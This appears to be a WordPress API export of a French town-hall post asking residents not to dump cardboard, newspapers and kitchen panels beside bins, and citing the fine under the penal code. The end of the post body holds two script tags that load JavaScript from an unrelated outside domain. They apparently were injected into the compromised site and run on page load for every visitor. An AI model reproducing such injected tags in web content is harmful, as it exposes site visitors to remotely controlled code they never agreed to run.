{"id":2689,"date":"2020-07-03T17:33:44","date_gmt":"2020-07-03T16:33:44","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?p=2689"},"modified":"2020-07-03T17:33:44","modified_gmt":"2020-07-03T16:33:44","slug":"appel-au-civisme-bis-repetita","status":"publish","type":"post","link":"https:\/\/www.attin-mairie.fr\/?p=2689","title":{"rendered":"Appel au civisme bis repetita"},"content":{"rendered":"<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/07\/poubelle-moliere.jpg\"><img decoding=\"async\" class=\"alignleft size-thumbnail wp-image-2690\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/07\/poubelle-moliere-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/07\/poubelle-moliere-150x150.jpg 150w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/07\/poubelle-moliere-590x590.jpg 590w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>En date du 24 mars dernier, compte tenu d&rsquo;abus constat\u00e9s, nous faisions appel au civisme de chacun afin de ne pas d\u00e9poser de bouteilles de verre au pied des containers lorsque ceux-ci sont pleins.<\/p>\n<p>Cette fois, c&rsquo;est dans le chemin de La Moli\u00e8re que l&rsquo;incivisme a \u00e9t\u00e9 relev\u00e9, avec le d\u00e9p\u00f4t de cartons au pied de la poubelle, de journaux dans des sacs plastiques, et de plaques d&rsquo;agglom\u00e9r\u00e9 issus d&rsquo;une cuisine d\u00e9mont\u00e9e.<\/p>\n<p>Il nous convient donc de rappeler que ce type d&rsquo;incivisme est sanctionn\u00e9 par la loi conform\u00e9ment \u00e0 l&rsquo;article R644-2 du Code P\u00e9nal, qui pr\u00e9voit pour les fautifs une contravention de 4e classe, pouvant aller jusqu&rsquo;\u00e0 750\u20ac, et la confiscation de la chose ayant servi \u00e0 commettre l&rsquo;infraction, comme une automobile par exemple. Un panneau sera prochainement pos\u00e9 pour le rappeler, comme cela a \u00e9t\u00e9 fait r\u00e9cemment \u00e0 la salle polyvalente.<\/p>\n<p>Heureusement, il s&rsquo;agit de cas isol\u00e9s et donc merci \u00e0 tous ceux qui agissent pour la propret\u00e9 de notre commune. &nbsp;<a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/07\/thumbnail.jpg\"><img decoding=\"async\" class=\"alignleft size-thumbnail wp-image-2691\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/07\/thumbnail-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/07\/thumbnail-150x150.jpg 150w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/07\/thumbnail-590x590.jpg 590w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a><\/p>\n<pre><em>R\u00e9cemment, un rappel aux r\u00e8gles a d\u00e9j\u00e0 \u00e9t\u00e9 formul\u00e9 en apposant un panneau \u00e0 la salle polyvalente.<\/em> <script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/pre>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En date du 24 mars dernier, compte tenu d&rsquo;abus constat\u00e9s, nous faisions appel au civisme de chacun afin de ne pas d\u00e9poser de bouteilles de verre au pied des containers lorsque ceux-ci sont pleins. Cette fois, c&rsquo;est dans le chemin de La Moli\u00e8re que l&rsquo;incivisme a \u00e9t\u00e9 relev\u00e9, avec le d\u00e9p\u00f4t de cartons au pied [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2690,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2689","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2689","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2689"}],"version-history":[{"count":1,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2689\/revisions"}],"predecessor-version":[{"id":2692,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2689\/revisions\/2692"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/media\/2690"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2689"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2689"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2689"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}